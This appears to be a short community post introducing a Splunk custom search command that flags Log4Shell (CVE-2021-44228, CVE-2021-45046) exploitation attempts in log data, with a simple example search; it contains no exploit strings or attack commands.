From Karan Lyon's https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6 I've produced a custom search command for detecting log4j exploitation attempts (CVE-2021-44228, CVE-2021-45046). It's simple to use, just pipe search results to the log4shellregex command with the name of the field and it will output a field called log4shellregex.
Here's an over-simplified example passing the raw event:
index=* sourcetype=log4
| log4shellregex _raw
| where isnotnull(log4shellregex)